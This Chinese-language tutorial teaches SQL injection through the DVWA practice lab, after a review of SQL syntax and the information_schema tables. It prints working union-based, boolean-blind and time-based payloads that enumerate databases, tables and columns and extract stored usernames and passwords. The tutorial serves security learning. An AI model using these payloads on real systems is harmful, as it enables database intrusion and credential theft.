目录

SQL语句什么是sql注入？sql注入的原理有关sql注入产生的条件SQL查询语句selectWHERE ：SQL常用聚合函数：union、limit其他SQL注入分类和步骤步骤1. 找注入点2. 闭合语句3. 注入攻击4. 数据库名、表名、字段名数字型与字符型注入通过DVWA靶场来熟悉三种注入方式联合查询注入布尔盲注基于时间注入1.时间盲注利用前提2.时间盲注利用

SQL语句

什么是sql注入？

攻击者利用Web应用程序对用户输入验证上的疏忽,在输入的数据中包含对某些数据库系统有特殊意义的符号或命令,让攻击者有机会直接对后台数据库系统下达指令,进而实现对后台数据库乃至整个应用系统的入侵，对于sql注入可以把它归为一句话：所谓的sql注入就是通过某种方式将恶意的sql代码添加到输入参数中，然后传递到sql服务器使其解析并执行的一种攻击手法。

sql注入的原理

概述：针对SQL注入的攻击行为可描述为：在与用户交互的程序中（如web网页）,非法用户通过可控参数注入SQL语法,将恶意sql语句输入拼接到原本设计好的SQL语句中，破坏原有SQL语法结构，执行了与原定计划不同的行为，达到程序编写时意料之外结果的攻击行为，其本质就是使用了字符串拼接方式构造sql语句，并且对于用户输入检查不充分,导致SQL语句将用户提交的非法数据当作语句的一部分来执行，从而造成了sql注入。

有关sql注入产生的条件

程序编写者在处理程序和数据库交互时，使用了字符串拼接的方式构造SQL语句不安全的数据库配置，比如对查询集不合理处理，对sql查询语句错误时不当的处理，导致其错误信息暴露在前端过于信任用户在前端所输入的数值，没有过滤用户输入的恶意数据，且未对用户可控参数进行足够的过滤便将参数内容拼接进入到SQL语句中,直接把用户输入的数据当做SQL语句执行,从而影响数据库安全和平台安全

SQL查询语句

select

SELECT <目标列名序列> -- 需要哪些列FROM <表名> [JOIN <表名> ON <连接条件>] -- 来自哪些表[WHERE <行选择条件>] -- 根据什么条件[GROUP BY <分组依据列>][HAVING <组选择条件>][ORDER BY <排列依据列>]

SELECT * FROM Student

SELECT 子句用于指定输出的字段FROM 子句用于指定数据的来源WHERE 子句用于指定数据的行选择条件GROUP BY 子句用于对检索到的记录进行分组HAVING 子句用于指定对分组后结果的选择条件ORDER BY 子句用于对查询的结果进行排序

WHERE ：

-- 1. 比较大小--------------------------------------------SELECT Sname FROM Student WHERE Sdept='计算机系' SELECT Sno, Cno, Grade FROM SC WHERE Grade > 90-- 2. 确定范围--------------------------------------------SELECT Cname, Credit, Semester FROM Course WHERE Credit BETWEEN 2 AND 3-- 等价于WHERE Credit >= 2 AND Credit <=3-- 3. 确定集合---------------------------------------------- 查询‘计算机系’和‘机电系’学生的学号、姓名和所在系SELECT Sno, Sname, Sdept FROM Student WHERE Sdept IN ('计算机系', '机电系')-- 4. 字符串匹配--------------------------------------------SELECT Sno, Sname, Sdept FROM Student WHERE Sname LIKE '李%'-- 5. 涉及空值的查询---------------------------------------------- 查询还没有考试的学生的学号、相应的课程号SELECT Sno, Cno FROM SC WHERE Grade IS NULL-- 6. 多重条件查询---------------------------------------------- 查询‘计算机系’有备注的学生的学好、姓名、所在系和备注SELECT Sno, Sname, Sdept, Memo FROM StudentWHERE Memo IS NOT NULL AND Sdelt = '计算机系'

SQL常用聚合函数：

COUNT(*)：统计表中元组的个数COUNT([DISTINCT] <列名>)：统计本列的列值个数，DISTINCT表示去掉重复值后再统计SUM(<列名>)：计算列值的和值（必须是数值类型）AVG(<列名>)：计算列值的平均值（必须是数值类型）MAX(<列名>)：得到列的最大值MIN(<列名>)：得到列的最小值

union、limit

与关系代数中集合运算并、交和差对应的谓词，分别是UNION、INTERSECT、EXCEPT，当使用这些操作进行查询时，参与运算的两个查询需要分别用括号扩起来。

-- 查询‘计算机系’和‘机电系’的所有学生信息(SELECT Sno, Sname, Ssex, SdeptFROM Student WHERE Sdept = '计算机系')UNION(SELECT Sno, Sname, Ssex, SdeptFROM Student WHERE Sdept = '机电系')-- 查询同时选修了‘C01’与‘C02’课程的学生学号(SELECT Sno FROM SC WHERE Cno='C01')INTERSECT(SELECT Sno FROM SC WHERE Cno='C02')-- 查询选修了‘C01’但没选‘C02’课程的学生的学号(SELECT Sno FROM SC WHERE Cno = 'C01')EXCEPT(SELECT Sno FROM SC WHERE Cno='C02')

LIMIT子句简介要检索查询返回的行的一部分，请使用LIMIT和OFFSET子句。 以下说明了这些子句的语法：SELECT column_listFROMtable1ORDER BY column_listLIMIT row_count OFFSET offset;

其他

函数

substr() 截取数据库某一列字段中的一部分。database() 返回当前使用的数据库group_concat()把一列的数据，全部整合到一起

information_schema数据库

COLUMNS 表存储表中的列信息，包括表有多少列、每个列的类型等。SHOW COLUMNS FROM schemaname.tablename 命令从这个表获取结果。mysql> SELECT * FROM COLUMNS LIMIT 2,5;

TABLES 表存储数据库中的表信息（包括视图），包括表属于哪个数据库，表的类型、存储引擎、创建时间等信息。SHOW TABLES FROM XX; 命令从这个表获取结果。mysql> SELECT * FROM TABLES;

SQL注入分类和步骤

步骤

1. 找注入点

2. 闭合语句

3. 注入攻击

4. 数据库名、表名、字段名

数字型与字符型注入

通过DVWA靶场来熟悉三种注入方式

/developer/article/1922143

数字型：

url/auth.php?a=1 and 1=1# //正常url/auth.php?a=1 and 1=2# //错误

字符型：

url/auth.php?a=-1' or 1=1# //正常

联合查询注入

1.先用万能密码1‘ or 1=1#，简单判断是否存在注入

联合查询相当于把别的表的数据查询结果显示到当前表，使用联合查询时，必须使得两张表的表结构一致，因此我们需要判断当前表的列数有多少列

2.闭合前面的单引号，构造联合注入语句，输入1'order by 1#，页面正常，然后输入1'order by 2 #，依次增加，直到3时出现错误，如图，说明当前表有2列

3.接下来构造联合查询语句确定显示的位置(SQL语句查询之后的回显位置)

1' union select 1,2#

下图可以看出有2个回显

4.接着构造联合查询语句查询当前数据库用户和数据库名，结果会显示在上图对应的位置：'union select user(),database()#

5.使用information_schema来查询到所有的数据，查询当前数据库中的表名

1' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#

得出表名guestbook和users

6.获取表中的字段名

1' union select 1, group_concat(column_name) from information_schema.columns where table_name='users'#

7.获得字段中的数据

1' union select user,password from users#

这里主要运用到了information_schema库， TABLES表里的table_name表名和COLUMNS的column_name字段名

在SQL注入中，我们重点关注的表有如下几个，因为主要的时候主要利用这几个表来获取数据：

SCHEMATA：提供了当前mysql数据库中所有数据库的信息，其中SCHEMA_NAME字段保存了所有的数据库名。show

databases的结果取自此表。

TABLES：提供了关于数据库中的表的信息，详细表述了某个表属于哪个schema，表类型，表引擎，创建时间等信息，其中table_name字段保存了所有列名信息，show tables from schemaname的结果取自此表。

COLUMNS：提供了表中的列信息。详细表述了某张表的所有列以及每个列的信息，其中column_name保存了所有的字段信息。show

columns from schemaname.tablename的结果取自此表。

布尔盲注

基于bool的盲注通常用函数

length()，返回长度ascii()，返回ASCII值substr(string,a,b)，返回string以a开头，长度为b的字符串count(column_name) 返回指定列的值的数目(NULL 不计入)

常用三种payload：

分别代表闭合语句和注释语句。注释有两种注释方法，#和--1' and length(database())='11' and length(database())=2#1' and length(database())=3--

1.判断是字符型还是数值型，由下列判断得出是字符型

输入1显示存在输入1 and 1=1 或 1 and 1=2均显示存在输入1' and 1=1 #显示存在输入1'and 1=2 #不存在

SQL源语句：

$query = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";

2.查数据库前要先判断数据库的长度

依次输入1' and length(database())=x #（x为大于等于1的整数）

当显示存在时即为数据库长度

发现当x=4时显示存在，故数据库长度为4

3.二分法找数据库名

依次输入1’ and ascii(substr(databse(),1,1))>或<字母的ascii值 # 通过比较输入字母的ascii值的显示正常与否来逐个确定库名

例

输入1' and ascii(substr(database(),1,1))>97 #显示存在，说明数据库名的第一个字符的ascii值大于97（小写字母a的ascii值）；输入1' and ascii(substr(database(),1,1))<122 #显示存在，说明数据库名的第一个字符的ascii值小于122（小写字母z的ascii值）；输入1' and ascii(substr(database(),1,1))<109 #显示存在，说明数据库名的第一个字符的ascii值小于109（小写字母m的ascii值）；…

重复上述步骤，就可以得到完整的数据库名dvwa

4.找数据库中的表

首先确定数据库中表的数量

1' and (select count (table_name) from information_schema.tables where table_schema=database())=x # （x为大于等于1的整数）当显示存在时即可判断表的数量最终当x=2显示存在即表的数量为2

然后确定表的长度

1' and length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=x #（x为大于等于1的整数）当显示存在时即可判断表的长度当x=9显示存在即表的长度为9

然后同样二分法确定表名

1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>或<字母的ascii值 #通过比较输入字母的ascii值的显示正常与否来逐个确定表名

例

1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>97 # 显示存在1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))<122 # 显示存在…

重复上述步骤可得到出两个表名guestbook、users

5.找表中的字段

首先找到字段的数量

1' and (select count(column_name) from information_schema.columns where table_name= 'users')=x #当显示存在时即为字段数最后当x=8时显示存在即字段数users字段数为8

然后找字段名

1' and length(substr((select column_name from information_schema.columns where table_name= 'users' limit 0,1),1))=x #当x=7时显示存在即users表的第一个字段为7个字符长度

最后也是二分法确定字段名

字段名出来了，之后就是一个一个爆每个字段的值了

基于时间注入

1.时间盲注利用前提

页面上没有显示位，也没有输出SQL语句执行错误信息。

正确的SQL语句和错误的SQL语句返回页面都一样，但是加入sleep(5)条件之后，页面的返回速度明显慢了5秒。

2.时间盲注利用

该语句判断数据库个数，当数据库个数等于n页面返回延迟5秒if((select count(schema_name) from information_schema.schemata)=n,sleep(5),1)该语句判断数据库内第一个数据库名有多少字符，字符个数等于n页面返回延迟5秒if((select length(schema_name) from information_schema.schemata limit 0,1)=n,sleep(5),1)该语句判断第一个库第一个字符是什么，ascii值等于n页面返回延迟5秒if((select ascii(substr((select schema_name from information_schema.schemata limit 0,1),1,1)))=n,sleep(5),1)

相关函数学习

Length（）函数 返回字符串的长度substr（）截取字符串ascii（）返回字符的ascii码sleep(n)：将程序挂起一段时间 n为n秒if(expr1,expr2,expr3):判断语句 如果第一个语句正确就执行第二个语句如果错误执行第三个语句count(column_name)函数返回指定列的值的数目(NULL 不计入)